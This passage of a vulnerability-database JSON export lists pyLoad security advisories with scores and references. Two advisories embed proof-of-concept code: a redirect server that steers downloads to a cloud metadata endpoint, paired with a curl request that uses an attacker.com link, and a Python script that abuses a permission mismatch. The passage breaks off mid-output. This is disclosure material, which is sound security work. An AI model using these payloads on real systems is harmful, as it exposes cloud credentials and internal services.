"8.1", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track*", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2025-10-10T14:29:28Z/" } ], "url": "https://github.com/pyload/pyload/pull/4624" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2025-61773", "reference_id": "CVE-2025-61773", "reference_type": "", "scores": [ { "value": "8.1", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-61773" }, { "reference_url": "https://github.com/advisories/GHSA-cjjf-27cc-pvmv", "reference_id": "GHSA-cjjf-27cc-pvmv", "reference_type": "", "scores": [ { "value": "HIGH", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-cjjf-27cc-pvmv" }, { "reference_url": "https://github.com/pyload/pyload/security/advisories/GHSA-cjjf-27cc-pvmv", "reference_id": "GHSA-cjjf-27cc-pvmv", "reference_type": "", "scores": [ { "value": "8.1", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:N" }, { "value": "HIGH", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track*", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2025-10-10T14:29:28Z/" } ], "url": "https://github.com/pyload/pyload/security/advisories/GHSA-cjjf-27cc-pvmv" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/48575?format=api", "purl": "pkg:pypi/pyload-ng@0.5.0b3.dev91", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-1k5h-nhcv-cke9" }, { "vulnerability": 
"VCID-4fna-mzsg-w7d5" }, { "vulnerability": "VCID-6ujx-ntw5-s7dy" }, { "vulnerability": "VCID-73d4-um61-k7ht" }, { "vulnerability": "VCID-9rb6-kh78-sbdf" }, { "vulnerability": "VCID-9u2h-q8gu-t7h4" }, { "vulnerability": "VCID-c4n8-pnbr-buce" }, { "vulnerability": "VCID-h66k-vm3m-c3b6" }, { "vulnerability": "VCID-hkus-pqz4-uyb2" }, { "vulnerability": "VCID-hsc6-6qgc-q3eg" }, { "vulnerability": "VCID-hzu2-r32u-q7c7" }, { "vulnerability": "VCID-jxej-fugb-3ydh" }, { "vulnerability": "VCID-ng6u-saxg-dbf9" }, { "vulnerability": "VCID-p22h-1rtx-bkcy" }, { "vulnerability": "VCID-qg7b-ayq5-8bax" }, { "vulnerability": "VCID-qmbx-7s8b-4khw" }, { "vulnerability": "VCID-ut9v-xcjn-ukb1" }, { "vulnerability": "VCID-vzzm-8en6-fydc" }, { "vulnerability": "VCID-x15r-v69w-yuaj" }, { "vulnerability": "VCID-x1ek-3cgq-skh9" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:pypi/pyload-ng@0.5.0b3.dev91" } ], "aliases": [ "CVE-2025-61773", "GHSA-cjjf-27cc-pvmv" ], "risk_score": null, "exploitability": null, "weighted_severity": null, "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-f95r-tk7k-gufe" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/57739?format=api", "vulnerability_id": "VCID-f9wx-gf1u-7bgc", "summary": "Pyload log Injection via API /json/add_package in add_name parameter\nA log injection vulnerability was identified in `pyload` in API `/json/add_package`. 
This vulnerability allows a user with the add-packages permission to inject arbitrary messages into the logs gathered by `pyload`.", "references": [ { "reference_url": "https://github.com/pyload/pyload", "reference_id": "", "reference_type": "", "scores": [ { "value": "4.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/pyload/pyload" }, { "reference_url": "https://github.com/pyload/pyload/commit/ddf8a48b83aaf36052b08732c424cffcf9ffccca", "reference_id": "", "reference_type": "", "scores": [ { "value": "4.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/pyload/pyload/commit/ddf8a48b83aaf36052b08732c424cffcf9ffccca" }, { "reference_url": "https://github.com/advisories/GHSA-3wwm-hjv7-23r3", "reference_id": "GHSA-3wwm-hjv7-23r3", "reference_type": "", "scores": [], "url": "https://github.com/advisories/GHSA-3wwm-hjv7-23r3" }, { "reference_url": "https://github.com/pyload/pyload/security/advisories/GHSA-3wwm-hjv7-23r3", "reference_id": "GHSA-3wwm-hjv7-23r3", "reference_type": "", "scores": [ { "value": "4.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/pyload/pyload/security/advisories/GHSA-3wwm-hjv7-23r3" } ], "fixed_packages": [], "aliases": [ "GHSA-3wwm-hjv7-23r3" ], "risk_score": 3.1, "exploitability": "0.5", "weighted_severity": "6.2", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-f9wx-gf1u-7bgc" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/37328?format=api", "vulnerability_id": "VCID-h66k-vm3m-c3b6", "summary": "pyLoad is a 
free and open-source download manager written in Python. Prior to 0.5.0b3.dev100, the set_config_value() API method (@permission(Perms.SETTINGS)) in src/pyload/core/api/__init__.py gates security-sensitive options behind a hand-maintained allowlist ADMIN_ONLY_CORE_OPTIONS. The allowlist contains (\"proxy\", \"username\") and (\"proxy\", \"password\") — which protect the proxy credentials — but it does not include (\"proxy\", \"enabled\"), (\"proxy\", \"host\"), (\"proxy\", \"port\"), or (\"proxy\", \"type\"). Any authenticated user with the non-admin SETTINGS permission can enable proxying and point pyload at any host they control. From that point, every outbound download, captcha fetch, update check, and plugin HTTP call is transparently routed through the attacker. This is a direct continuation of the fix family CVE-2026-33509 / CVE-2026-35463 / CVE-2026-35464 / CVE-2026-35586, each of which patched a different missed option in the same allowlist. This vulnerability is fixed in 0.5.0b3.dev100.", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-42313", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00016", "scoring_system": "epss", "scoring_elements": "0.0408", "published_at": "2026-06-05T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-42313" }, { "reference_url": "https://github.com/advisories/GHSA-4744-96p5-mp2j", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:L" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-4744-96p5-mp2j" }, { "reference_url": "https://github.com/advisories/GHSA-ppvx-rwh9-7rj7", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:L" }, { "value": "HIGH", 
"scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-ppvx-rwh9-7rj7" }, { "reference_url": "https://github.com/advisories/GHSA-r7mc-x6x7-cqxx", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:L" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-r7mc-x6x7-cqxx" }, { "reference_url": "https://github.com/advisories/GHSA-w48f-wwwf-f5fr", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:L" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-w48f-wwwf-f5fr" }, { "reference_url": "https://github.com/pyload/pyload", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:L" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/pyload/pyload" }, { "reference_url": "https://github.com/pyload/pyload/security/advisories/GHSA-pg67-9wjv-mr85", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:L" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track*", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2026-05-12T13:50:29Z/" } ], "url": "https://github.com/pyload/pyload/security/advisories/GHSA-pg67-9wjv-mr85" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-42313", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.3", "scoring_system": "cvssv3.1", 
"scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:L" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-42313" }, { "reference_url": "https://github.com/advisories/GHSA-pg67-9wjv-mr85", "reference_id": "GHSA-pg67-9wjv-mr85", "reference_type": "", "scores": [], "url": "https://github.com/advisories/GHSA-pg67-9wjv-mr85" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/50306?format=api", "purl": "pkg:pypi/pyload-ng@0.5.0b3.dev100", "is_vulnerable": false, "affected_by_vulnerabilities": [], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:pypi/pyload-ng@0.5.0b3.dev100" } ], "aliases": [ "CVE-2026-42313", "GHSA-pg67-9wjv-mr85", "PYSEC-2026-127" ], "risk_score": 4.0, "exploitability": "0.5", "weighted_severity": "8.0", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-h66k-vm3m-c3b6" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/88971?format=api", "vulnerability_id": "VCID-hkus-pqz4-uyb2", "summary": "pyLoad: SSRF filter bypass via HTTP redirect in BaseDownloader (Incomplete fix for CVE-2026-33992)\n## Summary\n\nThe fix for CVE-2026-33992 (GHSA-m74m-f7cr-432x) added IP validation to `BaseDownloader.download()` that checks the hostname of the initial download URL. However, pycurl is configured with `FOLLOWLOCATION=1` and `MAXREDIRS=10`, causing it to automatically follow HTTP redirects. 
Redirect targets are never validated against the SSRF filter.\n\nAn authenticated user with ADD permission can bypass the SSRF fix by submitting a URL that redirects to an internal address.\n\n## Root Cause\n\nThe SSRF check at `src/pyload/plugins/base/downloader.py:335-341` validates only the initial URL:\n\n dl_hostname = urllib.parse.urlparse(dl_url).hostname\n if is_ip_address(dl_hostname) and not is_global_address(dl_hostname):\n self.fail(...)\n else:\n for ip in host_to_ip(dl_hostname):\n if not is_global_address(ip):\n self.fail(...)\n\nAfter the check passes, `_download()` is called. pycurl is configured at `src/pyload/core/network/http/http_request.py:114-115` to follow redirects:\n\n self.c.setopt(pycurl.FOLLOWLOCATION, 1)\n self.c.setopt(pycurl.MAXREDIRS, 10)\n\nNo `CURLOPT_REDIR_PROTOCOLS` restriction is set anywhere in HTTPRequest. Redirect targets bypass the SSRF filter entirely.\n\n## PoC\n\nRedirect server (attacker-controlled):\n\n from http.server import HTTPServer, BaseHTTPRequestHandler\n\n class RedirectHandler(BaseHTTPRequestHandler):\n def do_GET(self):\n self.send_response(302)\n self.send_header(\"Location\", \"http://169.254.169.254/metadata/v1.json\")\n self.end_headers()\n\n HTTPServer((\"0.0.0.0\", 8888), RedirectHandler).serve_forever()\n\nSubmit to pyload (requires ADD permission):\n\n curl -b cookies.txt -X POST 'http://target:8000/json/add_package' \\\n -d 'add_name=ssrf-test&add_dest=1&add_links=http://attacker.com:8888/redirect'\n\nThe SSRF check resolves `attacker.com` to a public IP and passes. pycurl follows the 302 redirect to `http://169.254.169.254/metadata/v1.json` without validation. 
Cloud metadata is downloaded and saved to the storage folder.\n\n## Impact\n\nAn authenticated user with ADD permission can access:\n\n- Cloud metadata endpoints (169.254.169.254) for AWS, GCP, DigitalOcean, Azure — including IAM credentials and instance identity\n- Internal network services (10.x, 172.16.x, 192.168.x)\n- Localhost services (127.0.0.1)\n\nThis is the same impact as CVE-2026-33992 (rated Critical), achieved through a single redirect hop. The severity is reduced from Critical to High because authentication with ADD permission is now required.\n\n## Suggested Fix\n\nDisable automatic redirect following and validate each redirect target:\n\n # In HTTPRequest.__init__():\n self.c.setopt(pycurl.FOLLOWLOCATION, 0)\n\nThen implement manual redirect following in the download logic with SSRF validation at each hop. Alternatively, restrict redirect protocols:\n\n self.c.setopt(pycurl.REDIR_PROTOCOLS, pycurl.PROTO_HTTP | pycurl.PROTO_HTTPS)\n\nAnd add a pycurl callback to validate redirect destination IPs before following.\n\n## Resources\n\n- CVE-2026-33992 / GHSA-m74m-f7cr-432x: Original SSRF (Critical, unauthenticated). 
This bypass requires ADD permission.", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-35459", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00043", "scoring_system": "epss", "scoring_elements": "0.13369", "published_at": "2026-06-05T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-35459" }, { "reference_url": "https://github.com/pyload/pyload", "reference_id": "", "reference_type": "", "scores": [ { "value": "9.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:N/SC:H/SI:H/SA:N" }, { "value": "CRITICAL", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/pyload/pyload" }, { "reference_url": "https://github.com/pyload/pyload/commit/33c55da084320430edfd941b60e3da0eb1be9443", "reference_id": "", "reference_type": "", "scores": [ { "value": "9.1", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N" }, { "value": "9.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:N/SC:H/SI:H/SA:N" }, { "value": "CRITICAL", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track*", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:Y/T:T/P:M/B:A/M:M/D:R/2026-04-07T19:26:41Z/" } ], "url": "https://github.com/pyload/pyload/commit/33c55da084320430edfd941b60e3da0eb1be9443" }, { "reference_url": "https://github.com/pyload/pyload/security/advisories/GHSA-7gvf-3w72-p2pg", "reference_id": "", "reference_type": "", "scores": [ { "value": "9.1", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N" }, { "value": "9.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:N/SC:H/SI:H/SA:N" }, { "value": "CRITICAL", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track*", "scoring_system": 
"ssvc", "scoring_elements": "SSVCv2/E:P/A:Y/T:T/P:M/B:A/M:M/D:R/2026-04-07T19:26:41Z/" } ], "url": "https://github.com/pyload/pyload/security/advisories/GHSA-7gvf-3w72-p2pg" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-33992", "reference_id": "", "reference_type": "", "scores": [ { "value": "9.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:N/SC:H/SI:H/SA:N" }, { "value": "CRITICAL", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-33992" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-35459", "reference_id": "", "reference_type": "", "scores": [ { "value": "9.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:N/SC:H/SI:H/SA:N" }, { "value": "CRITICAL", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-35459" }, { "reference_url": "https://github.com/advisories/GHSA-7gvf-3w72-p2pg", "reference_id": "GHSA-7gvf-3w72-p2pg", "reference_type": "", "scores": [], "url": "https://github.com/advisories/GHSA-7gvf-3w72-p2pg" } ], "fixed_packages": [], "aliases": [ "CVE-2026-35459", "GHSA-7gvf-3w72-p2pg" ], "risk_score": null, "exploitability": null, "weighted_severity": null, "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-hkus-pqz4-uyb2" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/37253?format=api", "vulnerability_id": "VCID-hsc6-6qgc-q3eg", "summary": "pyLoad is a free and open-source download manager written in Python. Prior to version 0.5.0b3.dev97, a Host Header Spoofing vulnerability in the @local_check decorator allows unauthenticated external attackers to bypass local-only restrictions. 
This grants access to the Click'N'Load API endpoints, enabling attackers to remotely queue arbitrary downloads, leading to Server-Side Request Forgery (SSRF) and Denial of Service (DoS). This issue has been patched in version 0.5.0b3.dev97.", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-33314", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00011", "scoring_system": "epss", "scoring_elements": "0.0158", "published_at": "2026-06-05T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-33314" }, { "reference_url": "https://github.com/pyload/pyload", "reference_id": "", "reference_type": "", "scores": [ { "value": "6.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:L" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/pyload/pyload" }, { "reference_url": "https://github.com/pyload/pyload/security/advisories/GHSA-q485-cg9q-xq2r", "reference_id": "", "reference_type": "", "scores": [ { "value": "6.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:L" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:Y/T:P/P:M/B:A/M:M/D:T/2026-03-26T19:33:35Z/" } ], "url": "https://github.com/pyload/pyload/security/advisories/GHSA-q485-cg9q-xq2r" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-33314", "reference_id": "", "reference_type": "", "scores": [ { "value": "6.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:L" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-33314" }, { "reference_url": "https://github.com/advisories/GHSA-q485-cg9q-xq2r", "reference_id": 
"GHSA-q485-cg9q-xq2r", "reference_type": "", "scores": [], "url": "https://github.com/advisories/GHSA-q485-cg9q-xq2r" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/48581?format=api", "purl": "pkg:pypi/pyload-ng@0.5.0b3.dev97", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-1k5h-nhcv-cke9" }, { "vulnerability": "VCID-9u2h-q8gu-t7h4" }, { "vulnerability": "VCID-c4n8-pnbr-buce" }, { "vulnerability": "VCID-h66k-vm3m-c3b6" }, { "vulnerability": "VCID-hzu2-r32u-q7c7" }, { "vulnerability": "VCID-jxej-fugb-3ydh" }, { "vulnerability": "VCID-p22h-1rtx-bkcy" }, { "vulnerability": "VCID-qg7b-ayq5-8bax" }, { "vulnerability": "VCID-qmbx-7s8b-4khw" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:pypi/pyload-ng@0.5.0b3.dev97" } ], "aliases": [ "CVE-2026-33314", "GHSA-q485-cg9q-xq2r", "PYSEC-2026-122" ], "risk_score": 3.1, "exploitability": "0.5", "weighted_severity": "6.2", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-hsc6-6qgc-q3eg" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/55787?format=api", "vulnerability_id": "VCID-hva8-kb62-rkax", "summary": "Duplicate\nThis advisory duplicates another.", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2024-39205", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.83924", "scoring_system": "epss", "scoring_elements": "0.99313", "published_at": "2026-06-05T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2024-39205" }, { "reference_url": "https://github.com/pyload/pyload", "reference_id": "", "reference_type": "", "scores": [ { "value": "9.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" }, { "value": "9.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N" }, { "value": "CRITICAL", "scoring_system": "generic_textual", 
"scoring_elements": "" }, { "value": "Track*", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:Y/T:T/P:M/B:A/M:M/D:R/2024-10-30T20:48:52Z/" } ], "url": "https://github.com/pyload/pyload" }, { "reference_url": "https://github.com/Marven11/CVE-2024-28397-js2py-Sandbox-Escape", "reference_id": "CVE-2024-28397-JS2PY-SANDBOX-ESCAPE", "reference_type": "", "scores": [ { "value": "9.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" }, { "value": "9.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N" }, { "value": "CRITICAL", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/Marven11/CVE-2024-28397-js2py-Sandbox-Escape" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2024-39205", "reference_id": "CVE-2024-39205", "reference_type": "", "scores": [ { "value": "9.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" }, { "value": "9.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N" }, { "value": "CRITICAL", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-39205" }, { "reference_url": "https://github.com/advisories/GHSA-h95x-26f3-88hr", "reference_id": "GHSA-h95x-26f3-88hr", "reference_type": "", "scores": [ { "value": "9.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" }, { "value": "9.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N" }, { "value": "CRITICAL", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-h95x-26f3-88hr" }, { "reference_url": "https://github.com/advisories/GHSA-r9pp-r4xf-597r", "reference_id": "GHSA-r9pp-r4xf-597r", 
"reference_type": "", "scores": [ { "value": "CRITICAL", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-r9pp-r4xf-597r" }, { "reference_url": "https://github.com/pyload/pyload/security/advisories/GHSA-r9pp-r4xf-597r", "reference_id": "GHSA-r9pp-r4xf-597r", "reference_type": "", "scores": [ { "value": "9.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" }, { "value": "CRITICAL", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "9.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N" }, { "value": "CRITICAL", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track*", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:Y/T:T/P:M/B:A/M:M/D:R/2024-10-30T20:48:52Z/" } ], "url": "https://github.com/pyload/pyload/security/advisories/GHSA-r9pp-r4xf-597r" } ], "fixed_packages": [], "aliases": [ "CVE-2024-39205", "GHSA-r9pp-r4xf-597r" ], "risk_score": 10.0, "exploitability": "2.0", "weighted_severity": "9.0", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-hva8-kb62-rkax" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/89732?format=api", "vulnerability_id": "VCID-hzu2-r32u-q7c7", "summary": "pyload-ng has a WebUI JSON permission mismatch that lets ADD/DELETE users invoke MODIFY-only actions\n### Summary\nSeveral WebUI JSON endpoints enforce weaker permissions than the core API methods they invoke. 
This allows authenticated low-privileged users to execute `MODIFY` operations that should be denied by pyLoad's own permission model.\n\nConfirmed mismatches:\n- `ADD` user can reorder packages/files (`order_package`, `order_file`) via `/json/package_order` and `/json/link_order`\n- `DELETE` user can abort downloads (`stop_downloads`) via `/json/abort_link`\n\n### Details\npyLoad defines granular permissions in core API:\n- `order_package` requires `Perms.MODIFY` (`src/pyload/core/api/__init__.py:1125`)\n- `order_file` requires `Perms.MODIFY` (`src/pyload/core/api/__init__.py:1137`)\n- `stop_downloads` requires `Perms.MODIFY` (`src/pyload/core/api/__init__.py:1046`)\n\nBut WebUI JSON routes use weaker checks:\n- `/json/package_order` uses `@login_required(\"ADD\")` then calls `api.order_package(...)` (`src/pyload/webui/app/blueprints/json_blueprint.py:109-117`)\n- `/json/link_order` uses `@login_required(\"ADD\")` then calls `api.order_file(...)` (`src/pyload/webui/app/blueprints/json_blueprint.py:137-145`)\n- `/json/abort_link` uses `@login_required(\"DELETE\")` then calls `api.stop_downloads(...)` (`src/pyload/webui/app/blueprints/json_blueprint.py:123-131`)\n\nWhy this is likely unintended (not just convenience):\n- The same JSON blueprint correctly protects other edit actions with `MODIFY`:\n - `/json/move_package` -> `@login_required(\"MODIFY\")` (`json_blueprint.py:188-196`)\n - `/json/edit_package` -> `@login_required(\"MODIFY\")` (`json_blueprint.py:202-217`)\n- The project UI exposes granular per-user permission assignment (`settings.html:184-190`), implying these boundaries are intended security controls.\n\n### PoC\nEnvironment:\n- Repository version: `0.5.0b3` (`VERSION` file)\n- Commit tested: `ddc53b3d7`\n\nPoC A (ADD-only user invokes MODIFY-only reorder):\n```python\nimport os\nimport sys\nfrom types import SimpleNamespace\n\nsys.path.insert(0, os.path.abspath('src'))\n\nfrom flask import Flask\nfrom pyload.core.api import Api, Perms, Role\nfrom 
pyload.webui.app.blueprints import json_blueprint\n\nclass FakeApi:\n def __init__(self):\n self.calls = []\n\n def user_exists(self, username):\n return username == 'attacker'\n\n def order_package(self, pack_id, pos):\n self.calls.append(('order_package', int(pack_id), int(pos)))\n\n def order_file(self, file_id, pos):\n self.calls.append(('order_file', int(file_id), int(pos)))\n\napi = Api(SimpleNamespace(_=lambda x: x))\nctx = {'role': Role.USER, 'permission': Perms.ADD}\nprint('API auth (ADD-only) order_package:', api.is_authorized('order_package', ctx))\nprint('API auth (ADD-only) order_file:', api.is_authorized('order_file', ctx))\n\napp = Flask(__name__)\napp.secret_key = 'k'\napp.config['TESTING'] = True\napp.config['WTF_CSRF_ENABLED'] = False\nf = FakeApi()\napp.config['PYLOAD_API'] = f\napp.register_blueprint(json_blueprint.bp)\n\nwith app.test_client() as c:\n with c.session_transaction() as s:\n s['authenticated'] = True\n s['name'] = 'attacker'\n s['role'] = int(Role.USER)\n s['perms'] = int(Perms.ADD)\n\n r1 = c.post('/json/package_order', json={'pack_id': 5, 'pos': 0})\n r2 = c.post('/json/link_order', json={'file_id': 77, 'pos': 1})\n\nprint('HTTP /json/package_order:', r1.status_code, r1.get_data(as_text=True).strip())\nprint('HTTP /json/link_order:', r2.status_code, r2.get_data(as_text=True).strip())\nprint('calls:', f.calls)\n```\n\nObserved output:\n```text\nAPI auth (ADD-only) order_package: False\nAPI auth (ADD-only) order_file: False\nHTTP /json/package_order: 200 {\"response\":\"success\"}\nHTTP /json/link_order: 200 {\"response\":\"success\"}\ncalls: [('order_package', 5, 0), 